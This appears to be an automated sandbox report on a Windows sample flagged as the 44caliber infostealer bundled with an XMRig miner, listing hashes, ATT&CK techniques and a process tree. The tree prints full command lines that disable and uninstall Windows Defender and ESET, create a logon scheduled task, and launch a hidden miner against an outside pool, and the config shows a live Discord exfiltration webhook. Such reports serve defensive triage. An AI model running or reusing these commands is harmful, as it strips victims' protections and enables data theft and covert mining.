44caliber | 3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425

Analysis

max time kernel
0s
max time network
146s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
31/12/2023, 08:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2eb2782cc346b73b7180e3e9a220041c.exe
Size

9.3MB
MD5

2eb2782cc346b73b7180e3e9a220041c
SHA1

b5d7dbb4f29e2567f9e4d67a9d64d7034ff5a968
SHA256

3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425
SHA512

5124335f1362a836dd6f539052f705e64d080fc640abaf489c2407b819de9e79740ca0d5cc8a32310acecdd5e6a6076d83cb4cb7d013fc82b49b060c2b67dec9
SSDEEP

196608:DzB+082zIZNrOYyPugEl4ZXni32eZ3WU5QR6kj09F1lThXBhc+YX7:DzB+GeN/y2jl4N+2KWVR6u0P1l3Sj

Score

10^/10

44caliber xmrig evasion miner stealer

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral1/memory/2036-1510-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1513-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1512-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1515-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1516-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1518-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1519-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1526-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1528-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1517-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/2036-1509-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
2680	Interialoader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	freegeoip.app
3	freegeoip.app

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1244	sc.exe
1600	sc.exe
1280	sc.exe
2716	sc.exe
2784	sc.exe
1244	sc.exe
1004	sc.exe
3048	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2572	schtasks.exe
2272	schtasks.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2264 wrote to memory of 2680	2264	2eb2782cc346b73b7180e3e9a220041c.exe	28
PID 2264 wrote to memory of 2680	2264	2eb2782cc346b73b7180e3e9a220041c.exe	28
PID 2264 wrote to memory of 2680	2264	2eb2782cc346b73b7180e3e9a220041c.exe	28

C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe
"C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2264
- C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
  "C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"
  2⤵
  - Executes dropped EXE
  PID:2680
- - C:\Users\Admin\AppData\Local\Temp\Insidious.exe
    "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
    3⤵
    PID:2564
- - C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"
    3⤵
    PID:2644
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
      4⤵
      PID:2904
  - - C:\Users\Admin\AppData\Roaming\Services.exe
      "C:\Users\Admin\AppData\Roaming\Services.exe"
      4⤵
      PID:1536
    - - C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        5⤵
        
        PID:2500
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        6⤵
        
        PID:3028
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        6⤵
        
        PID:1576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        6⤵
        
        PID:2088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableArchiveScanning $true
        6⤵
        
        PID:1452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
        6⤵
        
        PID:2492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
        6⤵
        
        PID:824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableScriptScanning $true
        6⤵
        
        PID:2032
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
        6⤵
        
        PID:1616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIOAVProtection $true
        6⤵
        
        PID:2204
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
        6⤵
        
        PID:1956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
        6⤵
        
        PID:408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -MAPSReporting Disabled
        6⤵
        
        PID:1580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        6⤵
        
        PID:1468
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Stop-Service WinDefend
        6⤵
        
        PID:1680
      - C:\Windows\system32\sc.exe
        
        sc stop WinDefend
        6⤵
        Launches sc.exe
        
        PID:2784
      - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        6⤵
        Launches sc.exe
        
        PID:1244
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-Service WinDefend -StartupType Disabled
        6⤵
        
        PID:1376
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
        6⤵
        
        PID:1012
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
        6⤵
        
        PID:268
      - C:\Windows\system32\Dism.exe
        
        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
        6⤵
        
        PID:2760
      - C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic Product where name="Eset Security" call uninstall
        6⤵
        
        PID:2992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
        5⤵
        
        PID:2644
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:2272
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        
        PID:1288
      - C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        6⤵
        
        PID:1928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        
        PID:1668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        
        PID:1232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableArchiveScanning $true
        7⤵
        
        PID:2236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
        7⤵
        
        PID:1452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
        7⤵
        
        PID:2536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableScriptScanning $true
        7⤵
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
        7⤵
        
        PID:2512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIOAVProtection $true
        7⤵
        
        PID:376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
        7⤵
        
        PID:1488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
        7⤵
        
        PID:2972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -MAPSReporting Disabled
        7⤵
        
        PID:2540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        7⤵
        
        PID:1528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Stop-Service WinDefend
        7⤵
        
        PID:852
        
        C:\Windows\system32\sc.exe
        
        sc stop WinDefend
        7⤵
        Launches sc.exe
        
        PID:1244
        
        C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        7⤵
        Launches sc.exe
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-Service WinDefend -StartupType Disabled
        7⤵
        
        PID:2640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
        7⤵
        
        PID:352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
        7⤵
        
        PID:2680
        
        C:\Windows\system32\Dism.exe
        
        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
        7⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\dismhost.exe {B4A3C51C-44D4-46DA-A8B1-B841BC9F5D87}
        8⤵
        
        PID:1736
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic Product where name="Eset Security" call uninstall
        7⤵
        
        PID:3000
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
        5⤵
        
        PID:2036
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      PID:2944
- C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
  "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"
  2⤵
  PID:2704
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://java.com/download
    3⤵
    PID:2100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:2568

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:2536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
  2⤵
  PID:2424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  PID:300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  PID:268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableArchiveScanning $true
  2⤵
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
  2⤵
  PID:2244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:2112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
  2⤵
  PID:1480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:1600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
  2⤵
  PID:796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -MAPSReporting Disabled
  2⤵
  PID:3028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
  2⤵
  PID:1020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Stop-Service WinDefend
  2⤵
  PID:1576
- C:\Windows\system32\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  PID:1280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-Service WinDefend -StartupType Disabled
  2⤵
  PID:376
- C:\Windows\system32\sc.exe
  sc config WinDefend start=disabled
  2⤵
  - Launches sc.exe
  PID:2716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
  2⤵
  PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
  2⤵
  PID:852
- C:\Windows\system32\Dism.exe
  Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
  2⤵
  PID:1464
- - C:\Users\Admin\AppData\Local\Temp\229300D1-345A-4297-A9B8-0D34713749D9\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\229300D1-345A-4297-A9B8-0D34713749D9\dismhost.exe {DE4B2D20-4E23-408D-A3B8-20594FC0A24D}
    3⤵
    PID:2388
- C:\Windows\System32\Wbem\WMIC.exe
  Wmic Product where name="Eset Security" call uninstall
  2⤵
  PID:300

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2100 CREDAT:275457 /prefetch:2
1⤵
PID:2900

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
1⤵
- Creates scheduled task(s)
PID:2572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:2964

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:1980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
  2⤵
  PID:2236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  PID:320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  PID:3060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableArchiveScanning $true
  2⤵
  PID:576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
  2⤵
  PID:880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:3000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:2344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
  2⤵
  PID:2580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:1460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
  2⤵
  PID:1888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -MAPSReporting Disabled
  2⤵
  PID:332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
  2⤵
  PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Set-Service WinDefend -StartupType Disabled
  2⤵
  PID:776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Stop-Service WinDefend
  2⤵
  PID:820
- C:\Windows\system32\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  PID:1004
- C:\Windows\system32\sc.exe
  sc config WinDefend start=disabled
  2⤵
  - Launches sc.exe
  PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
  2⤵
  PID:2200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
  2⤵
  PID:2572
- C:\Windows\system32\Dism.exe
  Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
  2⤵
  PID:2812
- - C:\Users\Admin\AppData\Local\Temp\60B3B52D-B302-4850-83FB-AB30AED532B4\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\60B3B52D-B302-4850-83FB-AB30AED532B4\dismhost.exe {D7060BEB-5936-4DF1-B9E5-1A6BB1818D37}
    3⤵
    PID:400
- C:\Windows\System32\Wbem\WMIC.exe
  Wmic Product where name="Eset Security" call uninstall
  2⤵
  PID:2564

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:1624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:2716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\it-IT\OSProvider.dll.mui

Filesize
2KB

MD5
9493a8f48a72a01dc0784eb7e14ea98a

SHA1
3b1f3ee2a36c789dfc77faba06fb8d26257e0181

SHA256
0ee6cd54b411fa59321e5b4f8af36b5a4cc9e8dc09b57082fa5dc96f99e63f91

SHA512
c2d510e794e4be9225a6bc7230d8eb4029cff5c414d4a003c9940b94f30c5dc8a36359b15620e3f43f113ce5aa983c6290dbec753d90e908eab1134aa610ccce

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\it-IT\SmiProvider.dll.mui

Filesize
2KB

MD5
10d603187dc14fda7711b4f46f146930

SHA1
98259f732f69d931f8acc4103b231947418c1527

SHA256
1eebfc8bcfde8d41d484e49ba3ed2d247cfdc339cd8d04dce304cba2f3d4e427

SHA512
1795a6aa9fccc0dd99e104d4f5275052b679571eae8181eee15175dd37b253f36665656c99565042081c5fdd2136fafb100f67ce5ff5a7c508006d8e4051af25

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\it-IT\TransmogProvider.dll.mui

Filesize
13KB

MD5
427b7bd1d65a111c2c7abc064ed742fc

SHA1
6d869a81e21102c73c36248b500ab5001f96d57a

SHA256
f8cc90aa8265c48dbd345fc6362a90a64c39fd4655efe52f0f1909fe2973c423

SHA512
8c6980b65d2a9f3c8da5bfccc4e2047845609b97d9ad35f69fa93f4cab4f3a5faf816eb8fab4d855819fe33c7c24d40dbc10aeae1564b4b748bf2624654ad812

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\it-IT\UnattendProvider.dll.mui

Filesize
5KB

MD5
4764d3d02b3b379652793b4e7199b1f4

SHA1
39cd731d460d9f7ae6d9b4844111886038f20cdb

SHA256
b7ea5c14fba9db1dbaf28770262641ab588bb18c5349279d725e924b48fe9f86

SHA512
cde2303faf19a9229082fe542125b60f83910dbe0fb675eb9cea5d4da1f2a41ed96444be974dd12e4fbda51437731d82e887dc01a12327ed4d1d666b525b58cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ACA939F2-A2FD-46F5-BABB-88D78239AA80\it-IT\WimProvider.dll.mui

Filesize
14KB

MD5
c87ec456b727c78a0701d1e9ec9725c4

SHA1
